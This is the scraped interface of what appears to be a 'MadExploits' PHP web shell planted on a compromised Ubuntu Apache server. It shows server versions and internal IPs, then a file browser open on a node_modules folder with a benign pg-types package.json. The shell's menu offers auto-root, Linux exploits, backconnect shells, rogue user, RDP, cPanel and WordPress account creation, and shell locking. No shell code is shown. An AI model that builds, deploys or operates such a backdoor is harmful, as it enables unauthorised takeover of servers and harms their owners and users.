Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
pg-types /
[ HOME SHELL ]
Name
Size
Permission
Action
lib
[ DIR ]
drwxrwxr-x
test
[ DIR ]
drwxrwxr-x
.travis.yml
83
B
-rw-rw-r--
Makefile
232
B
-rw-rw-r--
README.md
3.74
KB
-rw-rw-r--
index.d.ts
2.57
KB
-rw-rw-r--
index.js
1.19
KB
-rw-rw-r--
index.test-d.ts
759
B
-rw-rw-r--
package.json
973
B
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "pg-types", "version": "2.2.0", "description": "Query result type converters for node-postgres", "main": "index.js", "scripts": { "test": "tape test/*.js | tap-spec && npm run test-ts", "test-ts": "if-node-version '>= 8' tsd" }, "repository": { "type": "git", "url": "git://github.com/brianc/node-pg-types.git" }, "keywords": [ "postgres", "PostgreSQL", "pg" ], "author": "Brian M. Carlson", "license": "MIT", "bugs": { "url": "https://github.com/brianc/node-pg-types/issues" }, "homepage": "https://github.com/brianc/node-pg-types", "devDependencies": { "if-node-version": "^1.1.1", "pff": "^1.0.0", "tap-spec": "^4.0.0", "tape": "^4.0.0", "tsd": "^0.7.4" }, "dependencies": { "pg-int8": "1.0.1", "postgres-array": "~2.0.0", "postgres-bytea": "~1.0.0", "postgres-date": "~1.0.4", "postgres-interval": "^1.1.0" }, "engines": { "node": ">=4" } }
Close